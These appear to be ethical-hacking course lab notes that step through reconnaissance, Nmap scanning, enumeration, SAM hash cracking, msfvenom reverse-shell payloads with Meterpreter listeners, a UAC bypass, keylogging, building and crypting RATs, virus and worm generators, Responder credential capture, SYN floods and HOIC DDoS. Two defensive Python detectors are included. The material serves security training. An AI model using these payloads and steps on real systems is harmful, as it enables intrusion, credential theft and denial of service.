Module 02: Footprinting and Reconnaissance

Open Source Information Gathering Using Windows Command Line Utilities
  ping -c 3 10.10.10.10
  ping www.xyz.com -f -l 1500 (Packet needs to be fragmented but DF set)
  ping www.xyz.com -f -l 1472
  tracert www.xyz.com

Collecting Information About a Target Website Using Firebug
  Firebug / developer tools

Mirroring Website Using HTTrack Web Site Copier

Advanced Network Route Tracing Using Path Analyzer Pro
  Timed trace

Information Gathering Using Metasploit
  service postgresql start
  msfdb init
  service postgresql restart
  msfconsole
  db_status
  nmap -Pn -sS -A -oX Test 10.10.10.0/24
  db_import Test
  hosts
  db_nmap -sS -A 10.10.10.16
  services
  use scanner/smb/smb_version
  show options
  set RHOSTS 10.10.10.8-16
  set THREADS 100
  run
  hosts
Module 03: Scanning Networks

UDP and TCP Packet Crafting Techniques using HPING3
  hping3 -1 (ICMP mode)
  hping3 -S (set the SYN flag)
  hping3 -c <count> (number of packets to send)
  hping3 --scan 1-1024 (scan mode over a port range)
  hping3 10.10.10.10 --udp --rand-source --data 500
  hping3 -S 10.10.10.10 -p 80 -c 5
  hping3 10.10.10.10 --flood
  e.g.
  hping3 --scan 1-3000 -S 10.10.10.10
  hping3 10.10.10.10 --udp --rand-source --data 500
  hping3 -S 10.10.10.10 -p 80 -c 5

Scanning The Network Using The Colasoft Packet Builder
  ARP Packet template, set Delta Time as 0.1
  Send All Packets window, check the Burst Mode

Basic Network Troubleshooting Using MegaPing
  Host scanner
  Port scanner

Understanding Network Scanning Using Nmap
  nmap -O
  nmap --packet-trace
  Slow comprehensive scan
  Null scan
  Enable all advanced/aggressive options (-A)
  nmap -sN -T4 -A 10.10.10.10

Exploring Various Network Scanning Techniques
  TCP connect() scan uses a normal TCP connection to determine whether a port is open.
  Xmas scan sends TCP segments with all flags set in the packet header, generating packets that are illegal according to RFC 793.
  ACK flag scan sends an ACK probe packet with a random sequence number.
  UDP scan sends a generic UDP packet to the target.
  IDLE scan sends spoofed packets to a target.
  TCP Connect scan: nmap -sT -T3 -A 10.10.10.12
  Xmas scan: nmap -sX -T4 10.10.10.12
  ACK scan: nmap -sA -v -T4 10.10.10.12
  IDLE scan: nmap -Pn -p 80 -sI 10.10.10.16 10.10.10.12
  Ping sweep: nmap -sP 10.10.10.*
  • TCP Connect Scan
  • Xmas Scan
  • ACK Flag Scan
  • UDP Scan
  • IDLE Scan

Inverse TCP Flag Scan and Stealth Scan

Scanning a Network Using NetScan Tools Pro

Avoiding Scanning Detection using Multiple Decoy IP Addresses
  nmap -f 10.10.10.10
  Scan with smaller MTU: nmap -mtu 8 10.10.10.10
  Decoy method: nmap -D RND:10 10.10.10.10

Drawing Network Diagrams Using Network Topology Mapper
  SolarWinds Network Topology Mapper

Checking for Live Systems Using Angry IP Scanner
  Scanning hosts/ports (Windows tool)

Scanning for Network Traffic Going Through a Computer's Adapter Using IP-Tools

Identify Target System OS with TTL and TCP Window Sizes using Wireshark
  Operating System (OS)                IP initial TTL   TCP window size
  Linux (kernel 2.4 and 2.6)           64               5840
  Google's customized Linux            64               5720
  FreeBSD                              64               65535
  Windows XP                           128              65535
  Windows 7, Vista and Server 2008     128              8192
  Cisco Router (IOS 12.4)              255              4128
Module 04: Enumeration

NetBIOS Enumeration Using Global Network Inventory (Hosts, Ports, Services)

Enumerating Network Resources Using Advanced IP Scanner (shutdown, radmin)

Performing Network Enumeration Using SuperScan

Enumerating Resources in a Local Machine Using Hyena

Performing Network Enumeration Using NetBIOS Enumerator

Enumerating a Network Using SoftPerfect Network Scanner

Enumerating a Target Network using Nmap and Net Use
  nmap -O 10.10.10.12
  You see that ports 135, 139, 445, etc. are open, and port 139 is using NetBIOS.
  On Windows 2012:
  nbtstat -A 10.10.10.16
  net use (to view the created null sessions/shared folders from your host)
  net use \\10.10.10.16\e ""\user:"" (create a null session)
  net use \\10.10.10.16\e ""/user:""

Enumerating Services on a Target Machine with Nmap
  nmap -sP 10.10.10.0/24 (ping sweep scan)
  nmap -sS 10.10.10.12 (stealthy SYN scan)
  nmap -sSV -O 10.10.10.12 (stealthy SYN scan with version detection along with OS detection)
  nmap -sSV -O 10.10.10.12 -oN Enumeration.txt

SNMP Enumeration Using snmp_enum with Nmap & Metasploit
  nmap -sU -p 161 10.10.10.12
  nmap -sU -p 161 --script=snmp-brute 10.10.10.12 (the snmp-brute script extracts the SNMP community string from the target machine)
  msfconsole
  use auxiliary/scanner/snmp/snmp_login
  show options
  set RHOSTS 10.10.10.12
  exploit
  use auxiliary/scanner/snmp/snmp_enum
  set RHOSTS 10.10.10.12
  exploit

LDAP Enumeration Using Active Directory Explorer (ADExplorer)

Enumerating information from Windows and Samba host using Enum4linux
  enum4linux -u martin -p apple -U 10.10.10.12 (user list)
  enum4linux -u martin -p apple -o 10.10.10.12 (operating system details)
  enum4linux -u martin -p apple -P 10.10.10.12 (password policy information)
  enum4linux -u martin -p apple -G 10.10.10.12 (group details)
  enum4linux -u martin -p apple -S 10.10.10.12 (share policy information)
Module 05: Vulnerability Analysis

Vulnerability Analysis Using Nessus
  https://localhost:8834
  Username: admin / Password: password
  Create a new policy: Policy Templates > Advanced Scan
  In the Settings section, select Host Discovery from the DISCOVERY drop-down list. Turn off the "Ping the remote host" option (toggle the blue switch to the left).
  Select Port Scanning and check the "Verify open TCP ports found by local port enumerators" option.
  In the Settings section, select ADVANCED. The Policy General Settings window with Advanced Setting Type appears. Set the values of "Max number of TCP sessions per host" and "Max number of TCP sessions per scan" to unlimited.
  Create a new scan with the new policy.
  Schedule settings > turn off the Enabled switch, then select Launch from the drop-down list to start the scan.

CGI Scanning with Nikto
  Nikto is not a stealthy tool: it scans a web server in the shortest possible time, but its activity will be logged by an IDS/IPS.
  nikto -h
  nikto -H
  nikto -h http://www.gs.com -Tuning 1
Module 06: System Hacking

Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
  The Security Account Manager (SAM) is a database file present on Windows machines that stores user accounts and security descriptors for users on the local computer. It stores users' passwords in hashed form (LM hash and NTLM hash). You need administrator access to dump the contents of the SAM file.
  cmd (administrator mode)
  wmic useraccount get name,sid
  PwDump7.exe > c:\hashes.txt
  Replace the box symbols before each user ID with the respective user name.
  ophcrack\x86\ophcrack.exe
  Load > PWDUMP file
  The Table Selection window appears; select "Vista free" in the list and click Install.
  Crack.

Creating and Using Rainbow Tables
  Winrtgen > Add Table
  The Rainbow Table properties window appears. Select ntlm from the Hash drop-down list. Set Min Len to 4, Max Len to 6 and Chain Count to 4000000. Select loweralpha from the Charset drop-down list (the charset depends on the password).
  rcrack_gui.exe launches RainbowCrack
  File > Load NTLM Hashes from PWDUMP File
  Rainbow Table > Search Rainbow Table

Auditing System Passwords Using L0phtCrack
  Password Auditing Wizard
  The Choose Audit Type section appears; select Strong Password Audit.

Exploiting Client Side Vulnerabilities and Establishing a VNC Session
  msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe
  Share Test.exe over HTTP.
  msfconsole
  use multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.11
  set LPORT 444
  run
  Download and run Test.exe on the target Windows machine.
  Observe that one session is created or opened in the Meterpreter shell. If the Meterpreter command line does not start interacting with the victim machine automatically, type sessions -i 1 and press Enter.
  In the Meterpreter command line, type sysinfo.
  run vnc
  A TightVNC window appears showing the victim's desktop.

Escalating Privileges by Exploiting Client Side Vulnerabilities
  msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Exploit.exe
  Share Exploit.exe over HTTP.
  msfconsole
  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.11
  exploit -j -z (start the listener)
  Download and run Exploit.exe on the target Windows machine.
  Observe that one session is created or opened in the Meterpreter shell. Type sessions -i 1 to start interacting with the victim machine.
  getuid
  run post/windows/gather/smart_hashdump
  The command fails to dump the password hashes because of insufficient privileges. We shall try to escalate privileges by bypassing the User Account Control setting that is blocking unrestricted access to the machine. First issue a getsystem command, which attempts to elevate the user's privileges: getsystem -t 1 uses the "Service - Named Pipe Impersonation (In Memory/Admin)" technique. In our case this command also fails to escalate privileges.
  background
  use exploit/windows/local/bypassuac_fodhelper
  show options
  set SESSION 1
  set payload windows/meterpreter/reverse_tcp
  show options
  set LHOST 10.10.10.11
  set TARGET 0 (0 is the exploit target ID)
  exploit
  getuid
  Re-issue the getsystem command in an attempt to elevate privileges:
  getsystem
  getuid
  The Meterpreter session is now running with SYSTEM privileges (NT AUTHORITY\SYSTEM).
  run post/windows/gather/smart_hashdump

Hacking Windows 10 using Metasploit, and Post-Exploitation Using Meterpreter
  msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe
  Share Backdoor.exe over HTTP.
  msfconsole
  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.11
  show options
  exploit -j -z (start the listener)
  Download and run Backdoor.exe on the target Windows machine.
  Observe that one session is created or opened in the Meterpreter shell. Type sessions -i 1 to start interacting with the victim machine.
  sysinfo
  ipconfig
  getuid
  pwd
  ls
  To view the MACE attributes of secret.txt: timestomp secret.txt -v
  cd C:\; pwd; ls; download bootmgr
  search -f pagefile.sys
  keyscan_start
  keyscan_dump
  idletime
  shutdown

User System Monitoring and Surveillance Using Spytech SpyAgent
  Establish a Remote Desktop Connection and install SpyAgent.
  Setup password=spytech
  Complete + Stealth Configuration
  Load on Windows Startup
  Start Monitoring
  To bring SpyAgent out of stealth mode press CTRL+Shift+Alt+M

Web Activity Monitoring and Recording using Power Spy
  Establish a Remote Desktop Connection and install Power Spy.
  Setup Power Spy
  Stealth Configuration
  Use the Ctrl+Alt+X keys to unhide.
Hiding Files Using NTFS Streams
  type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
  mklink backdoor.exe readme.txt:calc.exe

Hiding Data Using White Space Steganography
  snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt
  snow -C -p "magic" readme2.txt

Image Steganography Using OpenStego (saves in .png)

Image Steganography Using Quick Stego (saves in .bmp)

Viewing, Enabling, and Clearing Audit Policies Using Auditpol
  auditpol /get /category:*
  auditpol /set /category:"system","account logon" /success:enable /failure:enable
  auditpol /get /category:*
  auditpol /clear /y
  auditpol /get /category:*

Covert Channels using Covert_TCP
  In Kali Linux: cc -o covert_tcp covert_tcp.c
  Do the same in Ubuntu.
  To start a listener: ./covert_tcp -dest 10.10.10.9 -source 10.10.10.11 -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/receive/receive.txt
  In Kali Linux, Applications --> Sniffing & Spoofing, select Wireshark and monitor eth0.
  ./covert_tcp -dest 10.10.10.9 -source 10.10.10.11 -source_port 8888 -dest_port 9999 -file /root/Desktop/send/message.txt
  Covert_TCP rewrites a header field of each TCP/IP packet to carry one character of the message, so the message crosses the network one character per packet and never appears in a payload. If you examine the communication between the Ubuntu and Kali machines (10.10.10.11 and 10.10.10.9), you will find each character of the message string being sent in an individual packet.
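The defender's view of the Covert_TCP exchange above, as an added example that is not part of the lab notes: a detector that groups captured packets into flows and flags a flow whose IP ID values decode to text. It assumes the character rides in the 16-bit IP ID field (one of Covert_TCP's modes); which byte of the field carries it is not assumed, so both readings are checked. The packet records are constructed.

```python
from collections import defaultdict

# Printable ASCII plus tab/newline/carriage return; anything else counts as
# non-text when a decoded byte stream is scored.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def _pkt(src, dst, sport, dport, ip_id):
    return {"src": src, "dst": dst, "sport": sport, "dport": dport, "ip_id": ip_id}


# Constructed sample capture, one record per packet (no real traffic):
#  - 10.10.10.11 -> 10.10.10.9 (8888 -> 9999): "secret" in the low byte of the IP ID
#  - 10.10.10.11 -> 10.10.10.9 (40001 -> 9999): "ping" in the high byte of the IP ID
#  - 10.10.10.16 -> 10.10.10.9: ordinary random IP IDs (benign)
#  - 10.10.10.12 -> 10.10.10.9: incrementing IP IDs that happen to decode as
#    "ABCDE" (benign; a counter, not a message)
SAMPLE_PACKETS = (
    [_pkt("10.10.10.11", "10.10.10.9", 8888, 9999, c) for c in b"secret"]
    + [_pkt("10.10.10.11", "10.10.10.9", 40001, 9999, c << 8) for c in b"ping"]
    + [_pkt("10.10.10.16", "10.10.10.9", 51515, 80, i)
       for i in (0x1A2B, 0x7F3E, 0x0C9D, 0xE4F1, 0x5A60)]
    + [_pkt("10.10.10.12", "10.10.10.9", 52000, 445, i) for i in range(0x41, 0x46)]
)


def text_score(stream: bytes) -> float:
    """Fraction of bytes that are printable ASCII (0.0 for an empty stream)."""
    if not stream:
        return 0.0
    return sum(1 for b in stream if b in PRINTABLE) / len(stream)


def is_sequential(stream: bytes) -> bool:
    """True when every byte is exactly the previous byte + 1 (an ID counter)."""
    return len(stream) > 1 and all(b - a == 1 for a, b in zip(stream, stream[1:]))


def find_covert_flows(packets, min_packets=4, threshold=0.9):
    """Flag flows whose IP ID field decodes to text.

    A flow is flagged when it has at least min_packets packets, one byte of the
    ID field decodes to mostly printable ASCII, and the other byte is constant
    across the flow (genuine per-packet IDs vary in both bytes). Incrementing
    IDs that land in the ASCII range are excluded as counters.
    """
    flows = defaultdict(list)
    for p in packets:
        flows[(p["src"], p["dst"], p["sport"], p["dport"])].append(p["ip_id"])

    findings = []
    for key, ids in flows.items():
        if len(ids) < min_packets:
            continue
        low = bytes(i & 0xFF for i in ids)
        high = bytes((i >> 8) & 0xFF for i in ids)
        for name, stream, other in (("low", low, high), ("high", high, low)):
            if text_score(stream) < threshold or len(set(other)) != 1:
                continue
            if is_sequential(stream):
                continue
            findings.append({
                "src": key[0], "dst": key[1], "sport": key[2], "dport": key[3],
                "byte": name, "message": stream.decode("ascii", "replace"),
            })
    return findings


if __name__ == "__main__":
    for f in find_covert_flows(SAMPLE_PACKETS):
        print(f"{f['src']}:{f['sport']} -> {f['dst']}:{f['dport']} "
              f"({f['byte']} byte of IP ID): {f['message']!r}")
```

The same check can be run over the TCP sequence or acknowledgement field for Covert_TCP's other modes by substituting that field for ip_id.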
Hacking Windows Server 2012 with a Malicious Office Document Using TheFatRat
  In Kali Linux, open fatrat
  [06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
  [3] Create exe file with apache + Powershell (FUD 100%)
  Set LHOST IP, LPORT (4444), Output file
  Choose Payload option: choose [ 3 ] windows/meterpreter/reverse_tcp by typing 3
  Type 8 and press Enter to go to the application main menu
  [07] Create Backdoor For Office with Microsploit, by typing 7
  |2| The Microsoft Office Macro on Windows, by typing 2
  Set LHOST IP, LPORT (4444), Output file
  At "Enter the message for the document body (ENTER = default):", leave the default.
  At the "Are you want Use custom exe file backdoor (y/n)" option, type y.
  Type /root/TheFatRat/output/payload.exe as the path.
  [ 3 ] windows/meterpreter/reverse_tcp, by typing 3
  Share the document with the web server.
  msfconsole
  use multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.11
  set LPORT 4444
  run (start the listener)
  On Windows 2012, open the shared document in MS Word and click Enable Content in the Security Warning alert.
  In Kali Linux, observe that one session is created or opened in the Meterpreter shell (if not, type sessions -i 1).
  sysinfo

Active Online Attack using Responder (LLMNR and NBT-NS)
  In Kali Linux: responder -I eth0
  On the Windows 10 victim machine, Run > type \\ceh-tools in the Open field and click OK.
  Leave the Windows 10 machine running and switch back to the Kali Linux machine.
  When DNS resolution for this host fails, the machine asks all other machines on the local network for the address via LLMNR on UDP/5355 or NBT-NS on UDP/137. An attacker can listen on the network for these LLMNR/NBT-NS broadcasts and respond to them. Responder collects the access credential hashes of the user logged in on the victim machine. By default Responder stores logs in /usr/share/responder/logs.
Crack passwords: john /usr/share/responder/logs/<file name of the logs.txt>
Module 07: Malware Threats

Creating an HTTP Trojan and Remotely Controlling a Target Machine Using HTTP RAT
  In Windows 2016, run httprat.exe
  Uncheck "send notification with ip address to mail".
  Set port 84 > Create
  In Windows 8, run the created httpserver.exe (check Task Manager for Httpserver (32bit)).
  In Windows 2016, open the Windows 8 IP in a browser. The z0mbie's HTTP_RAT page appears.

Creating a Trojan Server Using the GUI Trojan MoSucker
  In Windows 2012, run MoSucker CreateServer.exe; note the Connection-port.
  Keylogger > Enable off-line keylogger
  Run MoSucker.exe; fill in the IP and port of the target.
  Share and run the created server on the target.

Gaining Control over a Victim Machine Using njRAT
  In Windows 10, turn on Windows Defender Firewall (use recommended settings).
  In Windows 2016, run njRAT v0.7d.exe. Set the port and start.
  njRAT GUI > Builder > Host IP, Copy To StartUp and Registry StartUp > Build (Test.exe)
  Share Test.exe with Windows 10 and run it. njRAT gets a persistent connection.

Obfuscating a Trojan Using SwayzCryptor and Making it Undetectable to Various Anti-Virus Programs
  One method to bypass AVs is to "crypt" (an abbreviation of "encrypt") the malicious files using fully undetectable crypters (FUDs).
  Stay in the previous njRAT lab.
  In Windows 2016, run SwayzCryptor.exe
  File > Test.exe
  Check Start up, Mutex, and Disable UAC, and click Encrypt.
  Save as CryptedFile.exe
  Share CryptedFile.exe with Windows 2012 and run it. njRAT gets a persistent connection.

Creating a Server Using the ProRat Tool
  In Windows 10, run ProRat.exe.
  Create > Create ProRat Server (342 Kbayt)
  Set Server Port, Password, Victim Name.
  Check all options under 'Invisibility'.
  Bind with file > MyCar.jpg
  Server Extensions > EXE (Has icon support)
  Create Server
  Share binder_server.exe with Windows 2012 and run it.
  In ProRat, enter the IP of Windows 2012 > Connect. Enter the password of binder_server.exe. ProRat gets a remote connection.
Creating a Trojan Server Using Theef
  In Windows 2012, directly run the trojan Server210.exe
  In Windows 10, run Client210.exe > enter the victim's IP > Connect. Theef gets a remote connection.

Creating a Virus Using the JPS Virus Maker Tool
  In Windows 2012, run jps.exe
  Check the options embedded in the virus file: Disable Yahoo, Disable Internet Explorer, Disable Norton Anti Virus, Disable McAfee Anti Virus, Disable Taskbar, Disable Security Center, Disable Control Panel, Hide Windows Clock, Hide All Tasks in Taskmgr, Change Explorer Caption, Destroy Taskbar, Destroy Offlines (Y!Messenger), Destroy Audio Service, Terminate Windows and Auto Startup. Check Restart.
  Name after Install: Rundll32, Server name: Svchost.exe
  Create Virus!
  Check Change XP Password, Change Computer Name, Change IE Home Page.
  Enable Convert to Worm. Name: fedevi, Time: 1s. / Icon: JPG
  Create Virus! Svchost.exe is created.
  Pack this virus with a binder or virus packager and send it to the target.

Creating a Worm Using Internet Worm Maker Thing
  In Windows 2016, run Generator.exe
  Enter the worm name, author, version, message and output path.
  Check Compile To EXE Support.
  Select Activate Payloads on Date, Chance of activating payloads: 5.
  Select Hide All Drives, Disable Task Manager, Disable keyboard, Disable Mouse, and Message Box. Enter a Title and a Message, Icon: Information.
  Select Disable Regedit, Disable Explorer.exe and Change Reg owner. Set the Owner field, Change Reg Organisation and Change Homepage.
  Select Disable Windows Security, Disable Norton Security, Uninstall Norton Script Blocking, Disable Macro Security, Disable Run command, Disable shutdown, Disable Logoff, Disable windows Updates, No Search Command, Swap Mouse Button, and Open Web Page.
  Select Change IE Title Bar, Change Win Media Player Txt, Open Cd Drives, Lock Workstation and Download File.
  Select Print Message, Disable System Restore, and Change NOD32 Text (enter the respective texts).
  Select Mute Speakers, Delete a Folder, Change Wallpaper, and CPU Monster.
  Select Change Time, and enter Hour and Min.
  Select the Change Date check box, and enter DD, MM, and YY.
  Select Loop Sound, Hide Desktop, Disable Malware Remove, Disable Windows File Protection, Corrupt Antivirus, and Change Computer Name.
  Select Change Drive icon, Add To Context Menu, Change Clock Text, Keyboard Disco, and Add To Favorites.
  Select Exploit Windows Admin Lockout Bug and Blue Screen of Death.
  Select Infect Bat Files under Infection Options; select Hide Virus Files under Extras; and click Generate Worm under Control Panel. worm.vbs is created.

Virus Analysis using IDA
  In Windows 2016, run idademo73_windows.exe
  New > Viruses\Klez Virus Live!\face.exe
  IDA Pro Analysis > View > Graphs > Flow Chart
  View > Graphs > Function Calls
  Windows > Hex View-1
  Windows > Structures

Virus Analysis Using OllyDbg
  In Windows 2016, run OLLYDBG.EXE
  Open \Viruses\tini.exe
  View > Log
  View > Executable module
  View > Memory
  View > Threads

Detecting Trojans
  In Windows 2016, run Tcpview.exe. TCPView helps you analyze TCP and other ports.
  Run autoruns.exe; it displays all the processes, DLLs, services, and so on.
  In Windows 10, run jv16 PowerTools (full user interface; restart the computer after it is done).
  Clean and Speedup My Computer, Check Registry Errors and fix by deleting.
  Main Tools > Control which programs start automatically

Monitoring TCP/IP Connections Using CurrPorts
  In Windows 2016, run njRAT v0.7d.exe. Set the port and start.
  njRAT GUI > Builder > Host IP, Copy To StartUp and Registry StartUp > Build (Test.exe)
  Share Test.exe with Windows 10 and run it.
  In Windows 10, run CurrPorts (cports.exe). Observe the malicious process server.exe on port 5552.
  Kill Processes Of Selected Ports OR Close Selected TCP Connections

Removing Malware using ClamWin
  Previous lab required.
  In Windows 10, install ClamWin (uncheck "Download virus database file").
  Memory Scan, Scan C:

Performing Registry Entry Monitoring
  In Windows 2016, Regshot-x64-Unicode.exe > Run as administrator
  Logs save as HTML document
  1st Shot > Shot and Save
  Install some application (e.g. HashTool)
  2nd shot > Shot and Save
  Compare

Startup Program Monitoring Tool
  In Windows 2016, install WinPatrol (check Start the application).
  Startup Programs > Observe entries
  IE Helpers > Observe toolbars and links
  Services > Observe
  File Types > Observe (Info > Expand Info)
  Active Tasks > Observe running tasks
Module 08: Sniffing

Sniffing Passwords using Wireshark
  In Windows 2016, start the Wireshark capture process.
  In Windows 10, log in to www.xyz.com
  In Windows 2016, stop the capture and save it. Filter: http.request.method == "POST"
  In Windows 2016, Remote Desktop Connection: connect to Windows 10.
  Services > Remote Packet Capture Protocol v.0 (experimental) > Start
  Disconnect the remote desktop connection.
  In Windows 2016, Wireshark: Capture > Options > Manage Interfaces > Remote Interfaces > Add: Host (IP of Windows 10) / Port 2002 / Password authentication. Start the capture process.
  In Windows 10, log in to www.xyz.com
  In Windows 2016, check the traffic Wireshark captured remotely.

Analyzing a Network Using Capsa Network Analyzer
  In Windows 2016, install Colasoft Capsa 10 Enterprise Demo.
  IP Endpoint tab: easily find the nodes with the highest traffic volumes, and check whether there is a multicast storm or broadcast storm in the network. Ideal for statistical analysis and anomaly detection.

Spoofing MAC Address Using SMAC

Performing Man-in-the-Middle Attack using Cain & Abel
  In Windows 2016, Cain & Abel > Configure > Sniffer tab > select adapter > Start/Stop Sniffer (start)
  + in the toolbar > All hosts in my subnet + All Tests
  APR tab > click the topmost section in the right pane to activate the + icon
  First target (left) 10.10.10.10, second target (right) 10.10.10.12
  Select and click the Start/Stop APR button (third icon from the left in the menu bar).
  In Windows Server 2012, ftp 10.10.10.10 with user/pass.
  Cain & Abel > Passwords > FTP

Detecting ARP Poisoning in a Switch Based Network
  In Windows 10, Cain & Abel > Configure > Sniffer tab > select adapter > Start/Stop Sniffer (start)
  + in the toolbar > Range (10.10.10.1-10.10.10.30) + All Tests
  APR tab > click the topmost section in the right pane to activate the + icon
  10.10.10.16 (Windows Server 2016) and 10.10.10.11 (Kali Linux)
  Select and click the Start/Stop APR button (third icon from the left in the menu bar).
  In Kali Linux, hping3 10.10.10.16 -c 100000
  In Windows 10, Wireshark: Preferences > Protocols >
  ARP/RARP > Detect ARP request storms + Detect duplicate IP address configuration
  Select the adapter and start the capture; after adequate time, stop it.
  Analyze > Expert Information

Detecting ARP Attacks with XArp Tool
  In Windows 2016, XArp: Security level > aggressive
  Perform ARP poisoning between Windows Server 2016 and Kali Linux using Cain & Abel.
  XArp alerts appear.
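The two Wireshark ARP checks enabled above (duplicate IP address configuration and ARP request storms), as an added example that is not part of the lab notes, run over a constructed list of ARP records. The MAC addresses and the storm thresholds (30 requests in 100 ms) are this example's own choices, not values from the lab or Wireshark's stored preferences; a third function derives the victim pair from the duplicate claims.

```python
from collections import defaultdict

# Constructed MACs for the lab hosts (not real capture data).
MAC_WIN2016 = "00:0c:29:16:16:16"   # genuine owner of 10.10.10.16
MAC_KALI = "00:0c:29:11:11:11"      # genuine owner of 10.10.10.11
MAC_WIN10 = "00:0c:29:10:10:10"     # 10.10.10.10, the host running Cain & Abel
MAC_SCANNER = "00:0c:29:ee:ee:ee"   # source of a constructed ARP request burst

# ARP records: (time_s, opcode 1=request/2=reply, sender MAC, sender IP, target IP)
SAMPLE_ARP = [
    (0.00, 1, MAC_KALI, "10.10.10.11", "10.10.10.16"),     # Kali: who has .16?
    (0.01, 2, MAC_WIN2016, "10.10.10.16", "10.10.10.11"),  # genuine reply from .16
    (0.50, 2, MAC_WIN10, "10.10.10.16", "10.10.10.11"),    # APR: .10 claims to be .16
    (0.50, 2, MAC_WIN10, "10.10.10.11", "10.10.10.16"),    # APR: .10 claims to be .11
    (1.20, 2, MAC_WIN10, "10.10.10.16", "10.10.10.11"),    # poison refreshed
]
# 40 requests from one host inside 60 ms: the shape Wireshark calls a request storm.
SAMPLE_ARP += [(2.0 + i * 0.0015, 1, MAC_SCANNER, "10.10.10.99", f"10.10.10.{20 + i}")
               for i in range(40)]


def detect_duplicate_ip(records) -> dict:
    """Map each sender IP claimed by more than one MAC to its sorted MAC list."""
    claims = defaultdict(set)
    for _, _, mac, sender_ip, _ in records:
        claims[sender_ip].add(mac)
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def detect_request_storm(records, threshold: int = 30, window_s: float = 0.1) -> dict:
    """Map each sender MAC whose ARP requests reach `threshold` inside any
    `window_s`-second window to the peak count observed."""
    times = defaultdict(list)
    for t, opcode, mac, _, _ in records:
        if opcode == 1:
            times[mac].append(t)
    storms = {}
    for mac, ts in times.items():
        ts.sort()
        start, peak = 0, 0
        for end in range(len(ts)):            # sliding window over sorted timestamps
            while ts[end] - ts[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            storms[mac] = peak
    return storms


def poisoned_pairs(records) -> list:
    """A MAC that answers for two different IPs sits between those two hosts,
    which is exactly the Cain & Abel APR setup above. Returns (mac, [ip, ip])."""
    ips_by_mac = defaultdict(set)
    for _, opcode, mac, sender_ip, _ in records:
        if opcode == 2:
            ips_by_mac[mac].add(sender_ip)
    return [(mac, sorted(ips)) for mac, ips in ips_by_mac.items() if len(ips) > 1]


if __name__ == "__main__":
    print("duplicate IP claims:", detect_duplicate_ip(SAMPLE_ARP))
    print("request storms:", detect_request_storm(SAMPLE_ARP))
    print("hosts in the middle:", poisoned_pairs(SAMPLE_ARP))
```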
Module 09: Social Engineering

Sniffing Website Credentials Using Social Engineering Toolkit (SET)
  Social-Engineering Attacks > Website Attack Vectors > Credential Harvester Attack Method > Site Cloner
  POST back in Harvester/Tabnabbing
Module 10: Denial-of-Service

SYN Flooding a Target Host Using Metasploit
  nmap -p 21 [IP Address of target]
  msfconsole
  use auxiliary/dos/tcp/synflood
  show options
  set RHOST [IP Address of Windows 10]
  set RPORT 21
  set SHOST [IP Address of Windows Server 2016] (spoofed)
  set TIMEOUT 20000
  exploit
  In Windows 10, Wireshark filter: tcp.port == 21

SYN Flooding a Target Host Using hping3
  To launch hping3, navigate to Applications, click the 01 - Information Gathering node, click Live Host Identification and click hping3.
  hping3 -S [IP Address of Windows 10] -a [IP Address of Kali Linux] -p 22 --flood
  In Windows 10, Wireshark filter: tcp.port == 22

Performing Distributed Denial of Service Attack Using High Orbit Ion Cannon (HOIC)
  On Windows 2012, Windows 10 and Windows 8, run HOIC as below.
  [Target] + : type the target URL http://[IP Address of the target machine] in the URL field, slide the power bar to High, select the GenericBoost.hoic booster from the drop-down list, and click Add.
  Set the THREADS value to 20.
  FIRE TEH LAZER!
  Observe the traffic with Wireshark on the victim machine.
Module 11: Session Hijacking

Session Hijacking Using the Zed Attack Proxy (ZAP)
  Windows 10: Chrome > Sett
ings > Advanced > System > Open proxy settings. Configure the proxy (Windows 2016 VM - 10.10.10.16:8080).
  Windows 2016: run ZAP (no persistence).
  The Break tab allows you to modify a request or response once ZAP has caught it.
  Tools > Options > Local Proxies (Windows 2016 VM - 10.10.10.16:8080)
  Set break on all requests and responses from the ZAP toolbar.
  Click "Submit and step to next request or response" to manipulate.
Module 12: Evading IDS, Firewalls and Honeypots

Detecting Intrusions Using Snort
  In Windows 2012, copy snort.conf and paste it in C:\Snort\etc
  Copy the folders so_rules, preproc_rules and rules to C:\Snort
  cmd: snort. The "Initialization Complete" message displays. Ctrl+C
  cmd: snort -W. Observe the Ethernet driver index number.
  cmd: snort -dev -i <index number>
  In another cmd, ping 10.10.10.10; the ping triggers a Snort alert. Close all cmds.
  Edit snort.conf in Notepad++:
    HOME_NET - 10.10.10.12
    Set DNS_SERVERS, SMTP_SERVERS, HTTP_SERVERS, SQL_SERVERS, TELNET_SERVERS, and SSH_SERVERS
    RULE_PATH - C:\Snort\rules, SO_RULE_PATH - C:\Snort\so_rules, PREPROC_RULE_PATH - C:\Snort\preproc_rules
    WHITE_LIST_PATH, BLACK_LIST_PATH - C:\Snort\rules; create white_list.rules and black_list.rules in C:\Snort\rules
    Step #4: Configure dynamic loaded libraries section (Line 238)
      dynamic preprocessor libraries - C:\Snort\lib\snort_dynamicpreprocessor
      base preprocessor (or dynamic) engine - C:\Snort\lib\snort_dynamicengine\sf_engine.dll
      Comment out (#) the dynamic rules libraries line (dynamicdetection)
    Step #5: Configure Preprocessors
      Comment out all the preprocessor lines
      Line 325: delete the lzma keyword.
      Delete only lzma
      Lines 504-509: remove the backslash (\) at the end of each line, then comment out lines 504-509 (add #)
    Step #6: Configure output plugins
      Set classification.config and reference.config (C:\Snort\etc\classification.config and C:\Snort\etc\reference.config)
